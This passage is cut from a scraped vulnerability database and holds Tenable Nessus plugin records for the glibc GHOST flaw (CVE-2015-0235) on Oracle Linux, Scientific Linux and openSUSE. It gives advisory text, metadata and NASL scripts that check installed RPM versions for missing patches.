security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81031", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# Oracle Linux Security Advisory ELSA-2015-0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81031);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"Oracle Linux 6 / 7 : glibc (ELSA-2015-0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0092 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004812.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.0.4.el7_0.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.0.4.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:49", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81038", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81038);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2821\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c384376c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:30", "description": "This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that could lead to a local or remote buffer overflow. (bsc#913646)", "cvss3": {"score": null, "vector": null}, "published": "2015-02-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-debuginfo", "p-cpe:/a:novell:opensuse:glibc-debugsource", "p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo", "p-cpe:/a:novell:opensuse:glibc-devel-static", "p-cpe:/a:novell:opensuse:glibc-extra", "p-cpe:/a:novell:opensuse:glibc-extra-debuginfo", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:glibc-i18ndata", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc-utils", "p-cpe:/a:novell:opensuse:glibc-utils-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debugsource", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:nscd-debuginfo", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2015-84.NASL", "href": "https://www.tenable.com/plugins/nessus/81136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-84.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81136);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)\");\n script_summary(english:\"Check for the openSUSE-2015-84 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C\nLibrary, specifically in the function gethostbyname(), that could lead\nto a local or remote buffer overflow. (bsc#913646)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-02/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-static-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-html-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-i18ndata-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-info-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-profile-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.17-4.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:30", "description": "A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka GHOST. 